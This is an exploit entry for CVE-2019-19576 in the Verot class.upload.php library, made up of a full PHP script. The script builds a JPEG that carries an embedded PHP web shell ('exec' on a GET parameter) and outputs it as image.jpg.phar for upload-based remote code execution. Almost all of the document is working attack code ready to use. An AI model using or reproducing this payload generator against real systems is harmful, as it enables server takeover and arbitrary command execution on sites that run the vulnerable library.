1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130 | # Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576
<?php
#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation
#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).
ini_set('display_errors', 1);
error_reporting(E_PARSE);
#requires php, php-gd
$orig = 'image.jpg';
$code = '<?=exec($_GET["c"])?>';
$quality = "85";
$base_url = "http://lorempixel.com";
echo "-=Imagejpeg injector 1.7=-\n";
do
{
$x = 100;
$y = 100;
$url = $base_url . "/$x/$y/";
echo "[+] Fetching image ($x X $y) from $url\n";
file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));
echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.phar\n";
function tryInject($orig, $code, $quality)
{
$result_file = 'image.jpg.phar';
$tmp_filename = $orig . '_mod2.jpg';
//Create base image and load its data
$src = imagecreatefromjpeg($orig);
imagejpeg($src, $tmp_filename, $quality);
$data = file_get_contents($tmp_filename);
$tmpData = array();
echo "[+] Jumping to end byte\n";
$start_byte = findStart($data);
echo "[+] Searching for valid injection point\n";
for($i = strlen($data)-1; $i > $start_byte; --$i)
{
$tmpData = $data;
for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
{
$tmpData[$n] = $code[$z];
}
$src = imagecreatefromstring($tmpData);
imagejpeg($src, $result_file, $quality);
if(checkCodeInFile($result_file, $code))
{
unlink($tmp_filename);
unlink($result_file);
sleep(1);
file_put_contents($result_file, $tmpData);
echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
sleep(1);
$src = imagecreatefromjpeg($result_file);
return true;
}
else
{
unlink($result_file);
}
}
unlink($orig);
unlink($tmp_filename);
return false;
}
function findStart($str)
{
for($i = 0; $i < strlen($str); ++$i)
{
if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
{
return $i+2;
}
}
return -1;
}
function checkCodeInFile($file, $code)
{
if(file_exists($file))
{
$contents = loadFile($file);
}
else
{
$contents = "0";
}
return strstr($contents, $code);
}
function loadFile($file)
{
$handle = fopen($file, "r");
$buffer = fread($handle, filesize($file));
fclose($handle);
return $buffer;
}
|